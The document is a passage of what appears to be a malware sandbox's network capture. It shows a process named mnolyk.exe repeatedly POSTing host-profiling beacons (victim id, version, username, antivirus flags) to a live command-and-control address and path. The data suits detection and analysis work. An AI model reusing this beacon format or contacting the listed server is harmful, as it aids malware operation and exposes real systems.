                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:41.137222052 CET | 480 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      366 | 192.168.2.7 | 50061 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:41.341686964 CET | 481 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:41.406538963 CET | 481 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      367 | 192.168.2.7 | 50062 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:41.588090897 CET | 482 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:41.653572083 CET | 482 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      368 | 192.168.2.7 | 50063 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:41.843312979 CET | 483 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:41.907038927 CET | 483 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      369 | 192.168.2.7 | 50064 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:42.089378119 CET | 484 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:42.152475119 CET | 484 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      37 | 192.168.2.7 | 49731 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:10.568753004 CET | 141 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:10.632441998 CET | 141 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      370 | 192.168.2.7 | 50065 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:42.321938038 CET | 485 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:42.387288094 CET | 485 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      371 | 192.168.2.7 | 50066 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:42.558660030 CET | 486 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:42.624227047 CET | 486 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      372 | 192.168.2.7 | 50067 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:42.809417963 CET | 487 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:42.874066114 CET | 487 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      373 | 192.168.2.7 | 50068 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:43.057009935 CET | 488 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:43.122375011 CET | 488 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      374 | 192.168.2.7 | 50069 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:43.290159941 CET | 489 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:43.354147911 CET | 489 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      375 | 192.168.2.7 | 50070 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:43.541726112 CET | 490 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:43.606462002 CET | 490 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      376 | 192.168.2.7 | 50071 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:43.808187962 CET | 491 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:43.872343063 CET | 491 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      377 | 192.168.2.7 | 50072 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:44.049737930 CET | 492 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:44.112437963 CET | 492 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      378 | 192.168.2.7 | 50073 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:44.306613922 CET | 493 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:44.371047020 CET | 493 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      379 | 192.168.2.7 | 50074 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:44.559818983 CET | 494 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:44.626315117 CET | 494 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      38 | 192.168.2.7 | 49732 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:10.829865932 CET | 142 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:10.893610001 CET | 142 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      380 | 192.168.2.7 | 50075 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:44.816817045 CET | 495 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:44.882617950 CET | 495 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      381 | 192.168.2.7 | 50076 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:08:45.054389000 CET | 496 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:45.116996050 CET | 496 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
